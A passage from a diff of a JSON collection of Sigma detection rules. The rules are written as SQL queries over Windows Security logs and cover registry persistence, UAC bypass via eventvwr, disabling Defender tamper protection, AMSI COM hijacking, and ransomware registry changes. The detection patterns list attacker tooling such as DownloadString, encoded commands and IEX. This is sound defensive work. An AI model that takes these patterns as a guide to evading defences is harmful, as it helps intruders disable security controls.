Server\\\\Wds\\\\rdpwd\\\\StartupPrograms%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\SecurityProviders\\\\SecurityProviders%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Monitors%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NetworkProvider\\\\Order%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Notification Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Authentication Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootVerificationProgram\\\\ImagePath%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor%' ESCAPE '\\' AND (NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' OR NewValue LIKE 'CutePDF Writer' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%Print\\\\Monitors\\\\Appmon\\\\Ports\\\\Microsoft.Office.OneNote\\_%' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider\\\\Order\\\\ProviderOrder' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver' ESCAPE '\\' AND NewValue = 'VNCpm.dll')))" ], - "filename": "proc_creation_win_hxtsr_masquerading.yml" + "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml" }, { - "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet", - "id": "435e10e4-992a-4281-96f3-38b11106adde", + "title": "UAC Bypass via Event Viewer - Registry Set", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "status": "experimental", - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "author": "Nasreddine Bencherchali 
(Nextron Systems)", + "description": "Detects UAC bypass method using Windows event viewer", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADComputer %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" + "filename": "registry_set_uac_bypass_eventvwr.yml" }, { - "title": "Renamed FTP.EXE Execution", - "id": "277a4393-446c-449a-b0ed-7fdc7795244c", - "status": "test", - "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", - "author": "Victor Sergeev, oscd.community", + "title": "Disable Exploit Guard Network Protection on Windows Defender", + "id": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "status": "experimental", + "description": "Detects disabling Windows Defender Exploit Guard 
Network Protection", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.execution", - "attack.t1059", "attack.defense_evasion", - "attack.t1202" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'ftp.exe' AND NOT (NewProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride%' ESCAPE '\\' AND NewValue = 'DWORD (00000001)')" ], - "filename": "proc_creation_win_renamed_ftp.yml" + "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" }, { - "title": "Firewall Rule Deleted Via Netsh.EXE", - "id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", + "title": "Disable Tamper Protection on Windows Defender", + "id": "93d298a1-d28f-47f1-a468-d971e7796679", "status": "experimental", - "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", - "author": "frack113", + "description": "Detects disabling Windows Defender Tamper Protection", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate administration activity", - "Software installations and removal" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%delete %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND CommandLine LIKE 
'%name=Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_fw_delete_rule.yml" + "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml" }, { - "title": "WSF/JSE/JS/VBA/VBE File Execution", - "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", + "title": "Suspicious Service Installed", + "id": "f2485272-a156-4773-82d7-1d178bc4905b", "status": "test", - "description": "Detects suspicious file execution by wscript and cscript", - "author": "Michael Haag", + "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1562.001", + "attack.defense_evasion" ], "falsepositives": [ - "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." + "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('wscript.exe', 'cscript.exe') OR (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\NalDrv\\\\ImagePath' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PROCEXP152\\\\ImagePath' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\') AND NewValue LIKE '%\\\\WINDOWS\\\\system32\\\\Drivers\\\\PROCEXP152.SYS%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_script_execution.yml" + "filename": "registry_set_susp_service_installed.yml" }, { - "title": "Suspicious Sigverif Execution", - "id": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "title": "Potential AMSI COM Server Hijacking", + "id": "160d2780-31f7-4922-8b3a-efce30e63e96", "status": "experimental", - "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. 
When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sigverif.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_sigverif.yml" + "filename": "registry_set_amsi_com_hijack.yml" }, { - "title": "Potential PowerShell Downgrade Attack", - "id": "b3512211-c67e-4707-bedc-66efc7848863", + "title": "Blackbyte Ransomware Registry", + "id": "83314318-052a-4c90-a1ad-660ece38d276", "status": "test", - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "author": "Harish Segar (rule)", + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' AND (CommandLine LIKE '% -version 2 %' ESCAPE '\\' OR CommandLine 
LIKE '% -versio 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versi 2 %' ESCAPE '\\' OR CommandLine LIKE '% -vers 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ver 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ve 2 %' ESCAPE '\\' OR CommandLine LIKE '% -v 2 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_powershell_downgrade_attack.yml" + "filename": "registry_set_blackbyte_ransomware.yml" }, { - "title": "Possible Privilege Escalation via Weak Service Permissions", - "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "status": "test", - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "author": "Teymur Kheirkhabarov", + "title": "Disable Windows Event Logging Via Registry", + "id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", + "status": "experimental", + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting" ], "level": "high", "rule": [ - "SELECT * FROM logs 
WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Enabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE '%\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-FileInfoMinifilter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-ASN1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Kernel-AppCompat\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Runtime\\\\Error\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-CAPI2/Operational\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Compat-Appraiser%' ESCAPE '\\'))) AND NOT ((NewProcessName = '') OR (NewProcessName = '')))" ], - 
"filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" + "filename": "registry_set_disable_winevt_logging.yml" }, { - "title": "Execution via WorkFolders.exe", - "id": "0bbc6369-43e3-453d-9944-cae58821c173", - "status": "test", - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "author": "Maxime Thiebaut (@0xThiebaut)", + "title": "Suspicious Powershell In Registry Run Keys", + "id": "8d85cf08-bf97-4260-ba49-986a2a65129c", + "status": "experimental", + "description": "Detects potential PowerShell commands or code within registry run keys", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate usage of the uncommon Windows Work Folders feature." + "Legitimate admin or third party scripts. Baseline according to your environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh %' ESCAPE '\\' OR NewValue LIKE '%FromBase64String%' ESCAPE '\\' OR NewValue LIKE '%.DownloadFile(%' ESCAPE '\\' OR NewValue LIKE '%.DownloadString(%' ESCAPE '\\' OR NewValue LIKE '% -w hidden %' ESCAPE '\\' OR NewValue LIKE '% -w 1 %' ESCAPE '\\' OR NewValue LIKE '%-windowstyle hidden%' ESCAPE '\\' OR NewValue LIKE '%-window hidden%' ESCAPE '\\' OR NewValue LIKE '% -nop %' ESCAPE '\\' OR NewValue LIKE '% 
-encodedcommand %' ESCAPE '\\' OR NewValue LIKE '%-ExecutionPolicy Bypass%' ESCAPE '\\' OR NewValue LIKE '%Invoke-Expression%' ESCAPE '\\' OR NewValue LIKE '%IEX (%' ESCAPE '\\' OR NewValue LIKE '%Invoke-Command%' ESCAPE '\\' OR NewValue LIKE '%ICM -%' ESCAPE '\\' OR NewValue LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR NewValue LIKE '%IWR %' ESCAPE '\\' OR NewValue LIKE '% -noni %' ESCAPE '\\' OR NewValue LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_workfolders.yml" + "filename": "registry_set_powershell_in_run_keys.yml" }, { - "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", - "id": "044ba588-dff4-4918-9808-3f95e8160606", + "title": "New Root or CA or AuthRoot Certificate to Store", + "id": "d223b46b-5621-4037-88fe-fda32eead684", "status": "experimental", - "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", + "author": "frack113", "tags": [ - "attack.credential_access" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Blob' ESCAPE '\\' AND NewValue = 'Binary Data')" ], - "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" + "filename": "registry_set_install_root_or_ca_certificat.yml" }, { - "title": "Suspicious New Instance Of An Office COM Object", - "id": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "title": "Scripted Diagnostics Turn Off Check Enabled - Registry", + "id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", "status": "experimental", - "description": "Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\nThis can be used by malicious actors to create malicious Office documents with macros on the fly. 
(See vba2clr project in the references)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of office automation via scripting" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\ScriptedDiagnostics\\\\TurnOffCheck' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_office_svchost_parent.yml" + "filename": "registry_set_enabling_turnoffcheck.yml" }, { - "title": "Potential DLL Sideloading Via DeviceEnroller.EXE", - "id": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "title": "Disable Privacy Settings Experience in Registry", + "id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", "status": "experimental", - "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. 
This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "@gott_cyber", + "description": "Detects registry modifications that disable Privacy Settings Experience", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\deviceenroller.exe' ESCAPE '\\' OR OriginalFileName = 'deviceenroller.exe') AND CommandLine LIKE '%/PhoneDeepLink%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE\\\\DisablePrivacyExperience' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml" + "filename": "registry_set_disable_privacy_settings_experience.yml" }, { - "title": "HackTool - PowerTool Execution", - "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "title": "Register New IFiltre For Persistence", + "id": "b23818c7-e575-4d13-8012-332075ec0a2b", "status": "experimental", - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. 
You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence" + ], + "falsepositives": [ + "Legitimate registration of IFilters by the OS or software" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentHandler%' ESCAPE '\\') OR (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentAddinsRegistered\\\\{89BCB740-6119-101A-BCB7-00DD010655AF}%' ESCAPE '\\')) AND NOT (((TargetObject LIKE '%\\\\CLSID\\\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE 
